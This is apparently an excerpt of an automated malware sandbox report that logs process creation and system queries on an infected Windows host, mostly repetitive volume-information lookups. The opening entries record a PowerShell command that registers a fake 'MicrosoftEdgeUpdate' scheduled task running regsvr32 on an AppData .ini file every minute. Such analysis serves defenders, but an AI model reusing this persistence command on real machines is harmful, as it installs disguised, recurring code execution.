Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata/roaming/m08e.ini\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{4c8ccccc-0448-48c8-c088-8cccc0000044}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries)" Jump to behavior
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata/roaming/gga6.ini\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{4c0c80c0-8884-4c8c-ccc0-cc80c840c404}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries)"
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Windows\System32\OpenWith.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
